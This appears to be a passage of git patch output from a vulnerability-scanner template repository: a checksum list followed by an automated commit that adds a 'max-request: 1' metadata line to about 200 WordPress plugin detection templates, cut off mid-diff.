-http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 -http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 -http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 +http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f +http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd +http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 +http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 +http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee +http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba +http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee -http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c -http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 -http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f -http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 -http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c -http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 -http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce -http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 -http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b -http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 -http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b -http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 -http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 -http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 -http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 -http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 +http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 +http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 +http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 +http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 +http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a +http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 +http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded +http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 +http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1 +http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 +http/technologies/wordpress/plugins/wp-seopress.yaml:b7fcb27f3c6d85f16295a55a48ecd693b65a51ca +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 +http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad +http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 +http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f +http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 +http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 +http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -7024,7 +7027,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:03a2768af8a668087fbd4b6f0bf6357ae4d4df57 +templates-checksum.txt:86a76fcba5bda64812e95c90c13d343f9516826d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 13924733d797d5aa408f95ecfa8ad25d915ca6bf Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 31 Aug 2023 05:31:56 +0000 Subject: [PATCH 0029/1090] TemplateMan Update [Thu Aug 31 05:31:56 UTC 2023] :robot: --- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/astra-widgets.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-and-footer-scripts.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + http/technologies/wordpress/plugins/loginpress.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-builder.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/use-any-font.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 201 files changed, 201 insertions(+) diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..ebb5ba1042 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: + max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..fddfbf3118 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: + max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..7a6e8a76ec 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: + max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..940c0e614c 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: + max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 97f1d8c18f..06cfd4950b 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: + max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 10f104f2c7..90aa5881fd 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: + max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 8addc28ded..1bf337da6c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: + max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2e579621ac..7cec152555 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..8a4b6133cd 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..cfa2e3d080 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: + max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..a92d9bde4e 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: + max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..59144c7dd5 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: + max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index dc4703ef8d..df06ba2f35 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ 